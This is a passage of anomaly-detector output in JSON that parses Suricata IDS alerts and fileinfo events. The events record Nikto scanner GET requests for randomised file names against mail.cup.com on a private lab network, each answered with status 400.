[1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46900 -> 192.168.10.154:80", "/parser/model/time": 1583349514.298422, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46900, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.298422 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46900 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.3 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.html+", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.298641+0000\",\"flow_id\":1615758090734080,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46900,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.html+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.html+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.298641, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1615758090734080,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46900,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.html+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.html+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46900,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.html+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.html+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.html+\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.html+\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.html+", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.html+", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46900,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46900, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1615758090734080,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1615758090734080, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.298641+0000\",\"flow_id\":1615758090734080,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46900,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.html+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.html+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.3 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.300833 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46902 -> 192.168.10.154:80", "/parser/model/time": 1583349514.300833, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46902, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.300833 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46902 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.3 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.www_acl", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.301150+0000\",\"flow_id\":2081933841044299,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46902,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.www_acl\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.www_acl\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.30115, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":2081933841044299,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46902,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.www_acl\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.www_acl\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46902,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.www_acl\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.www_acl\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.www_acl\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.www_acl\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.www_acl", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.www_acl", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46902,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46902, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":2081933841044299,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 2081933841044299, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.301150+0000\",\"flow_id\":2081933841044299,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46902,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.www_acl\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.www_acl\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.3 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.303601 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46904 -> 192.168.10.154:80", "/parser/model/time": 1583349514.303601, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46904, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.303601 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46904 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.3 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.ca", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.303839+0000\",\"flow_id\":1429962100481725,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46904,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.ca\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.ca\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.303839, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1429962100481725,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46904,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.ca\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.ca\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46904,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.ca\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.ca\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.ca\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.ca\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.ca", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.ca", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46904,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46904, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1429962100481725,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1429962100481725, 